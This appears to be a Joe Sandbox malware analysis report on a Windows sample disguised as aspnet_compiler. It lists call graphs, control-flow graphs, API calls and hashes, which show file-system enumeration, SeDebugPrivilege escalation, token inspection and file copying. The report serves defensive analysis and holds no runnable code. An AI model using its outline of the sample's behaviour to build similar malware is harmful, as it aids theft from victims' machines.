8200 4057a1 8199->8200 8201 4057bd 8199->8201 8200->8201 8203 4056fc 8200->8203 8201->8183 8204 405714 8203->8204 8205 402b7c 2 API calls 8204->8205 8206 405730 8205->8206 8207 402bab 2 API calls 8206->8207 8208 405752 8206->8208 8207->8208 8208->8201 8210 4031e5 4 API calls 8209->8210 8211 4040d5 CreateFileW 8210->8211 8212 4040f8 8211->8212 8213 40418d 8211->8213 8214 4031e5 4 API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 8218->8250 8220 4041b3 8223 4040bb 10 API calls 8220->8223 8226 4041c8 8220->8226 8221->8218 8225 4031e5 4 API calls 8221->8225 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 CloseHandle 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 CopyFileW 8278->8279 8279->8220 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 4067ad 8295->8296 8296->8282 8298 4031e5 4 API calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 13 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap RtlFreeHeap 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8903 410cd1 8908 412093 8903->8908 8906 412093 21 API calls 8907 410cff 8906->8907 8910 4120a5 8908->8910 8929 410cf1 8908->8929 8909 4120b3 8911 404056 6 API calls 8909->8911 8910->8909 8914 412100 8910->8914 8912 4120ba 8911->8912 8913 405b6f 6 API calls 8912->8913 8915 412152 8912->8915 8912->8929 8916 412125 8913->8916 8918 403fbf 7 API calls 8914->8918 8914->8929 8930 403d74 8915->8930 8916->8915 8921 412139 8916->8921 8922 41214d 8916->8922 8918->8912 8920 41218c 8926 402bab 2 API calls 8920->8926 8920->8929 8925 402bab 2 API calls 8921->8925 8924 402bab 2 API calls 8922->8924 8923 402bab 2 API calls 8923->8920 8924->8915 8927 41213e 8925->8927 8926->8929 8928 402bab 2 API calls 8927->8928 8928->8929 8929->8906 8931 403d87 8930->8931 8932 403ea3 8931->8932 8933 405b6f 6 API calls 8931->8933 8934 405b6f 6 API calls 8932->8934 8935 403da3 8933->8935 8936 403eb9 8934->8936 8935->8932 8937 4031e5 4 API calls 8935->8937 8938 4031e5 4 API calls 8936->8938 8945 403f6f 8936->8945 8939 403dbc FindFirstFileW 8937->8939 8940 403ed3 FindFirstFileW 8938->8940 8952 403e9c 8939->8952 8961 403dd1 8939->8961 8944 403ee8 8940->8944 8959 403f8d 8940->8959 8941 402bab 2 API calls 8941->8945 8942 402bab 2 API calls 8942->8932 8943 4031e5 4 API calls 8946 403e84 FindNextFileW 8943->8946 8949 405b6f 6 API calls 8944->8949 8950 4031e5 4 API calls 8944->8950 8955 403f75 8944->8955 8963 402bab 2 API calls 8944->8963 8973 40fa23 8944->8973 8945->8920 8945->8923 8947 403e96 8946->8947 8946->8961 8970 403bef 8947->8970 8949->8944 8951 403f50 FindNextFileW 8950->8951 8951->8944 8954 403f87 8951->8954 8952->8942 8953 405b6f 6 API calls 8953->8961 8956 403bef 5 API calls 8954->8956 8957 402bab 2 API calls 8955->8957 8956->8959 8960 403f7b 8957->8960 8958 403d74 16 API calls 8958->8961 8959->8941 8962 403bef 5 API calls 8960->8962 8961->8943 8961->8953 8961->8958 8964 402bab 2 API calls 8961->8964 8965 403f63 8961->8965 8962->8945 8963->8944 8964->8961 8966 402bab 2 API calls 8965->8966 8967 403f69 8966->8967 8968 403bef 5 API calls 8967->8968 8968->8945 8971 4031e5 4 API calls 8970->8971 8972 403c01 FindClose 8971->8972 8972->8952 8974 40fa39 8973->8974 8975 410293 8974->8975 8976 405b6f 6 API calls 8974->8976 8975->8944 8977 40ffcc 8976->8977 8977->8975 8978 4040bb 13 API calls 8977->8978 8979 40ffeb 8978->8979 8980 41028c 8979->8980 8983 402b7c 2 API calls 8979->8983 9028 41027d 8979->9028 8981 402bab 2 API calls 8980->8981 8981->8975 8982 403f9e 5 API calls 8982->8980 8984 41001e 8983->8984 8985 40a423 4 API calls 8984->8985 8984->9028 8986 41004a 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 41005c 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 410079 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 410096 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100b0 8993->8994 8995 4031e5 4 API calls 8994->8995 8996 4100cd 8995->8996 8997 4031e5 4 API calls 8996->8997 8998 4100ea 8997->8998 9029 412516 8998->9029 9000 4100fd 9001 40642c 5 API calls 9000->9001 9002 41013e 9001->9002 9003 410142 9002->9003 9004 41019f 9002->9004 9005 40488c 5 API calls 9003->9005 9007 4031e5 4 API calls 9004->9007 9006 410151 9005->9006 9009 41019c 9006->9009 9010 404866 4 API calls 9006->9010 9021 4101bb 9007->9021 9008 41022a 9018 413a58 14 API calls 9008->9018 9009->9008 9011 40642c 5 API calls 9009->9011 9012 410163 9010->9012 9013 410201 9011->9013 9017 406c4c 6 API calls 9012->9017 9026 41018e 9012->9026 9015 410205 9013->9015 9016 41022f 9013->9016 9014 403c40 5 API calls 9014->9009 9019 4126a7 7 API calls 9015->9019 9032 4125db 9016->9032 9022 410178 9017->9022 9023 41026e 9018->9023 9019->9008 9024 4031e5 4 API calls 9021->9024 9025 406c4c 6 API calls 9022->9025 9027 402bab 2 API calls 9023->9027 9024->9009 9025->9026 9026->9014 9027->9028 9028->8982 9030 4031e5 4 API calls 9029->9030 9031 412539 9030->9031 9031->9000 9033 40488c 5 API calls 9032->9033 9034 4125ec 9033->9034 9035 41269f 9034->9035 9036 4031e5 4 API calls 9034->9036 9035->9008 9037 412609 9036->9037 9039 4031e5 4 API calls 9037->9039 9044 41268f 9037->9044 9038 403c40 5 API calls 9038->9035 9040 41262a 9039->9040 9048 412675 9040->9048 9049 4124f1 9040->9049 9042 4031e5 4 API calls 9042->9044 9044->9038 9045 412663 9047 4031e5 4 API calls 9045->9047 9046 4124f1 4 API calls 9046->9045 9047->9048 9048->9042 9050 4031e5 4 API calls 9049->9050 9051 412503 9050->9051 9051->9045 9051->9046 9238 4049dc 9239 4031e5 4 API calls 9238->9239 9240 4049ef 9239->9240 9895 40cddd 9896 405b6f 6 API calls 9895->9896 9897 40cdee 9896->9897 9898 40ce06 9897->9898 9899 413a58 14 API calls 9897->9899 9900 405b6f 6 API calls 9898->9900 9907 40ce59 9898->9907 9901 40ce00 9899->9901 9903 40ce1c 9900->9903 9902 402bab 2 API calls 9901->9902 9902->9898 9904 403d74 20 API calls 9903->9904 9903->9907 9909 40ce52 9903->9909 9906 40ce45 9904->9906 9905 402bab 2 API calls 9905->9907 9908 402bab 2 API calls 9906->9908 9906->9909 9908->9909 9909->9905 9241 40ecde 9242 412093 21 API calls 9241->9242 9243 40ecfd 9242->9243 9244 412093 21 API calls 9243->9244 9245 40ed0d 9244->9245 9249 40e8df 9250 412093 21 API calls 9249->9250 9251 40e8f8 9250->9251 9252 412093 21 API calls 9251->9252 9253 40e908 9252->9253 9260 404b22 9253->9260 9255 40e91c 9256 40e936 9255->9256 9259 40e93d 9255->9259 9267 40e944 9255->9267 9258 402bab 2 API calls 9256->9258 9258->9259 9261 402b7c 2 API calls 9260->9261 9262 404b33 9261->9262 9266 404b66 9262->9266 9276 4049b3 9262->9276 9265 402bab 2 API calls 9265->9266 9266->9255 9268 4056bf 2 API calls 9267->9268 9269 40e952 9268->9269 9270 40e976 9269->9270 9271 4057df 14 API calls 9269->9271 9270->9256 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9270 9277 4031e5 4 API calls 9276->9277 9278 4049c6 9277->9278 9278->9265 9278->9266 9279 4139de 9288 413855 9279->9288 9281 4139f1 9282 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9281->9282 9283 4139f7 9282->9283 9284 413866 59 API calls 9283->9284 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9289 4031e5 4 API calls 9288->9289 9290 413864 9289->9290 9290->9290 9915 4116e7 9916 4117ba 9915->9916 9917 4117f1 9916->9917 9918 405b6f 6 API calls 9916->9918 9919 4117d0 9918->9919 9919->9917 9920 404cbf 8 API calls 9919->9920 9921 4117eb 9920->9921 9922 402bab 2 API calls 9921->9922 9922->9917 9310 4094e7 9311 404b22 6 API calls 9310->9311 9312 4094fe 9311->9312 9313 409554 9312->9313 9314 405b6f 6 API calls 9312->9314 9315 409514 9314->9315 9317 404b22 6 API calls 9315->9317 9322 40954d 9315->9322 9316 402bab 2 API calls 9316->9313 9318 40952d 9317->9318 9319 409408 16 API calls 9318->9319 9324 409544 9318->9324 9321 40953e 9319->9321 9320 402bab 2 API calls 9320->9322 9323 402bab 2 API calls 9321->9323 9322->9316 9323->9324 9324->9320 9333 4058ea 9334 4031e5 4 API calls 9333->9334 9335 4058fd StrStrA 9334->9335 9967 40d4ea 9968 404bee 6 API calls 9967->9968 9969 40d500 9968->9969 9970 40d5a0 9969->9970 9971 404bee 6 API calls 9969->9971 9972 40d529 9971->9972 9973 404bee 6 API calls 9972->9973 9974 40d537 9973->9974 9975 404bee 6 API calls 9974->9975 9976 40d546 9975->9976 9976->9970 9977 405872 4 API calls 9976->9977 9978 40d56d 9977->9978 9979 405872 4 API calls 9978->9979 9980 40d57c 9979->9980 9981 405872 4 API calls 9980->9981 9982 40d58e 9981->9982 9983 405872 4 API calls 9982->9983 9983->9970 9984 40a3ea 9985 40374e 6 API calls 9984->9985 9986 40a403 9985->9986 9987 40a419 9986->9987 9988 4059d8 4 API calls 9986->9988 9989 40a411 9988->9989 9990 402bab 2 API calls 9989->9990 9990->9987 9373 404df3 WSAStartup 9377 4091f6 9378 404b22 6 API calls 9377->9378 9379 40920b 9378->9379 9380 409222 9379->9380 9381 409408 16 API calls 9379->9381 9382 40921c 9381->9382 9383 402bab 2 API calls 9382->9383 9383->9380 10017 4117fe 10018 404c4e 6 API calls 10017->10018 10019 411888 10018->10019 10020 404c4e 6 API calls 10019->10020 10022 411925 10019->10022 10021 4118ab 10020->10021 10021->10022 10036 4119b3 10021->10036 10024 4118c5 10025 4119b3 4 API calls 10024->10025 10026 4118d0 10025->10026 10026->10022 10027 4056bf 2 API calls 10026->10027 10028 4118fd 10027->10028 10029 405872 4 API calls 10028->10029 10030 41190a 10029->10030 10031 405872 4 API calls 10030->10031 10032 411915 10031->10032 10033 413aca 4 API calls 10032->10033 10034 41191f 10033->10034 10035 405695 2 API calls 10034->10035 10035->10022 10037 4119c6 10036->10037 10039 4119bf 10036->10039 10038 4031e5 4 API calls 10037->10038 10038->10039 10039->10024 9387 40e880 9388 41219c 15 API calls 9387->9388 9389 40e88e 9388->9389 9390 41219c 15 API calls 9389->9390 9391 40e89c 9390->9391 10103 40e48a 10104 404bee 6 API calls 10103->10104 10106 40e4d0 10104->10106 10105 40e4f4 10106->10105 10107 405872 4 API calls 10106->10107 10107->10105 9488 410390 9489 404b22 6 API calls 9488->9489 9490 4103a5 9489->9490 9491 410409 9490->9491 9492 405b6f 6 API calls 9490->9492 9496 4103ba 9492->9496 9493 410402 9494 402bab 2 API calls 9493->9494 9494->9491 9495 402bab 2 API calls 9495->9493 9496->9493 9497 403d74 20 API calls 9496->9497 9500 4103fb 9496->9500 9498 4103ee 9497->9498 9499 402bab 2 API calls 9498->9499 9498->9500 9499->9500 9500->9495 10118 40ed96 10119 4040bb 13 API calls 10118->10119 10133 40edb0 10119->10133 10120 40ef90 10121 40ef87 10122 403f9e 5 API calls 10121->10122 10122->10120 10123 405ae9 6 API calls 10123->10133 10124 412269 6 API calls 10124->10133 10125 40ef61 10127 40ef6e 10125->10127 10129 402bab 2 API calls 10125->10129 10126 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10126->10133 10128 40ef7c 10127->10128 10130 402bab 2 API calls 10127->10130 10128->10121 10131 402bab 2 API calls 10128->10131 10129->10127 10130->10128 10131->10121 10132 402bab GetProcessHeap RtlFreeHeap 10132->10133 10133->10120 10133->10121 10133->10123 10133->10124 10133->10125 10133->10126 10133->10132 10134 40ef98 10135 404c4e 6 API calls 10134->10135 10136 40efb6 10135->10136 10137 40f02a 10136->10137 10149 40f054 10136->10149 10140 404bee 6 API calls 10141 40efda 10140->10141 10142 404bee 6 API calls 10141->10142 10143 40efe9 10142->10143 10143->10137 10144 405872 4 API calls 10143->10144 10145 40f008 10144->10145 10146 405872 4 API calls 10145->10146 10147 40f01a 10146->10147 10148 405872 4 API calls 10147->10148 10148->10137 10150 40f064 10149->10150 10151 402b7c 2 API calls 10150->10151 10153 40f072 10151->10153 10152 40efca 10152->10140 10153->10152 10155 405ecd 10153->10155 10156 4059b8 4 API calls 10155->10156 10157 405edf 10156->10157 10157->10153 9507 410c98 9508 41219c 15 API calls 9507->9508 9509 410ca8 9508->9509 9510 41219c 15 API calls 9509->9510 9511 410cb5 9510->9511 9512 412093 21 API calls 9511->9512 9513 410cc9 9512->9513 10227 41249c 10228 4056bf 2 API calls 10227->10228 10229 4124aa 10228->10229 10230 4057df 14 API calls 10229->10230 10235 4124ce 10229->10235 10231 4124be 10230->10231 10232 413aca 4 API calls 10231->10232 10233 4124c8 10232->10233 10234 405695 2 API calls 10233->10234 10234->10235 9517 40f49e 9518 40f4b6 14 API calls 9517->9518 9519 40f4a8 9518->9519 9520 40929e 9521 413b28 6 API calls 9520->9521 9522 4092a4 9521->9522 9523 405b6f 6 API calls 9522->9523 9524 4092af 9523->9524 9525 4092c5 9524->9525 9526 409408 16 API calls 9524->9526 9527 4092bf 9526->9527 9528 402bab 2 API calls 9527->9528 9528->9525 10254 407fa4 10255 407fb7 10254->10255 10256 402b7c 2 API calls 10255->10256 10258 407fee 10255->10258 10257 40800d 10256->10257 10257->10258 10259 4037be 4 API calls 10257->10259 10260 40803c 10259->10260 10261 402bab 2 API calls 10260->10261 10261->10258 9565 4090aa 9566 404b22 6 API calls 9565->9566 9567 4090c1 9566->9567 9568 4090d8 9567->9568 9569 409408 16 API calls 9567->9569 9570 404b22 6 API calls 9568->9570 9571 4090d2 9569->9571 9572 4090eb 9570->9572 9573 402bab 2 API calls 9571->9573 9574 408c4d 16 API calls 9572->9574 9577 409104 9572->9577 9573->9568 9575 4090fe 9574->9575 9576 402bab 2 API calls 9575->9576 9576->9577 9584 409cae 9599 404b79 9584->9599 9586 409cc5 9587 409d27 9586->9587 9588 405b6f 6 API calls 9586->9588 9590 409d2f 9586->9590 9589 402bab 2 API calls 9587->9589 9591 409cec 9588->9591 9589->9590 9591->9587 9592 404b79 6 API calls 9591->9592 9593 409d05 9592->9593 9594 409d1e 9593->9594 9595 408c4d 16 API calls 9593->9595 9596 402bab 2 API calls 9594->9596 9597 409d18 9595->9597 9596->9587 9598 402bab 2 API calls 9597->9598 9598->9594 9600 404b22 6 API calls 9599->9600 9601 404b8a 9600->9601 9601->9586 10321 411fb3 10322 405b6f 6 API calls 10321->10322 10324 412013 10322->10324 10323 412075 10324->10323 10339 41206a 10324->10339 10340 411a8d 10324->10340 10326 402bab 2 API calls 10326->10323 10328 4056bf 2 API calls 10329 41203d 10328->10329 10330 405872 4 API calls 10329->10330 10331 41204a 10330->10331 10332 413aca 4 API calls 10331->10332 10333 412054 10332->10333 10334 405695 2 API calls 10333->10334 10335 41205a 10334->10335 10336 413a58 14 API calls 10335->10336 10337 412064 10336->10337 10338 402bab 2 API calls 10337->10338 10338->10339 10339->10326 10341 402b7c 2 API calls 10340->10341 10342 411aa3 10341->10342 10350 411f05 10342->10350 10363 404ada 10342->10363 10345 404ada 4 API calls 10346 411cad 10345->10346 10347 411f0c 10346->10347 10348 411cc0 10346->10348 10349 402bab 2 API calls 10347->10349 10366 405eb6 10348->10366 10349->10350 10350->10328 10350->10339 10352 411d3c 10353 4031e5 4 API calls 10352->10353 10361 411d7b 10353->10361 10354 411ea6 10355 4031e5 4 API calls 10354->10355 10356 411eb5 10355->10356 10357 4031e5 4 API calls 10356->10357 10358 411ed6 10357->10358 10359 405eb6 4 API calls 10358->10359 10359->10350 10360 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10360->10361 10361->10354 10361->10360 10362 405eb6 4 API calls 10361->10362 10362->10361 10364 4031e5 4 API calls 10363->10364 10365 404afd 10364->10365 10365->10345 10367 405998 4 API calls 10366->10367 10368 405ec8 10367->10368 10368->10352 9631 40f6b8 9632 41219c 15 API calls 9631->9632 9633 40f6c7 9632->9633 9634 41219c 15 API calls 9633->9634 9635 40f6d5 9634->9635 9636 41219c 15 API calls 9635->9636 9637 40f6df 9636->9637 9656 40d6bd 9657 4056bf 2 API calls 9656->9657 9658 40d6c9 9657->9658 9669 404cbf 9658->9669 9661 404cbf 8 API calls 9662 40d6f4 9661->9662 9663 404cbf 8 API calls 9662->9663 9664 40d702 9663->9664 9665 413aca 4 API calls 9664->9665 9666 40d711 9665->9666 9667 405695 2 API calls 9666->9667 9668 40d71f 9667->9668 9670 402b7c 2 API calls 9669->9670 9671 404ccd 9670->9671 9672 404ddc 9671->9672 9673 404b8f 5 API calls 9671->9673 9672->9661 9674 404ce4 9673->9674 9675 404dd4 9674->9675 9677 402b7c 2 API calls 9674->9677 9676 402bab 2 API calls 9675->9676 9676->9672 9684 404d04 9677->9684 9678 404dcc 9679 404a39 5 API calls 9678->9679 9679->9675 9680 404dc6 9682 402bab 2 API calls 9680->9682 9681 402b7c 2 API calls 9681->9684 9682->9678 9683 404b8f 5 API calls 9683->9684 9684->9678 9684->9680 9684->9681 9684->9683 9685 402bab GetProcessHeap RtlFreeHeap 9684->9685 9686 404a39 5 API calls 9684->9686 9687 405b6f 6 API calls 9684->9687 9688 404cbf 8 API calls 9684->9688 9685->9684 9686->9684 9687->9684 9688->9684 9689 40f0bf 9690 4056bf 2 API calls 9689->9690 9691 40f0c9 9690->9691 9692 40f115 9691->9692 9694 404cbf 8 API calls 9691->9694 9693 41219c 15 API calls 9692->9693 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9692

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 154 403f97-403f9d 152->154 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 166 403e75-403e90 call 4031e5 FindNextFileW 159->166 167 403dde-403de2 159->167 160->150 175 403f03-403f0a 161->175 176 403efa-403f01 161->176 162->152 166->159 179 403e96-403e97 call 403bef 166->179 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 188 403e30-403e4c call 405b6f 172->188 189 403e24-403e2e 172->189 173->166 185 403dfb-403e10 call 405eff 173->185 181 403f12-403f2d call 405b6f 175->181 182 403f0c-403f10 175->182 176->175 180 403f41-403f5c call 4031e5 FindNextFileW 176->180 193 403e9c 179->193 196 403f87-403f88 call 403bef 180->196 197 403f5e-403f61 180->197 181->180 199 403f2f-403f33 181->199 182->180 182->181 185->166 185->172 188->166 203 403e4e-403e6f call 403d74 call 402bab 188->203 189->166 189->188 193->160 207 403f8d 196->207 197->161 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->180 217->154
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                      • String ID: %s\%s$%s\*$Program Files$Windows
                                                                                                                      • API String ID: 1690352074-2009209621
                                                                                                                      • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                                                                                                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                                                                                      • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                                                                                                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                                                                                      APIs
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 3615134276-2896544425
                                                                                                                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                                                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                                                                                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                                                                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1357844191-0
                                                                                                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                                                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                                                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062e4 call 4031e5 265->273 266->257 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                                                                                                      APIs
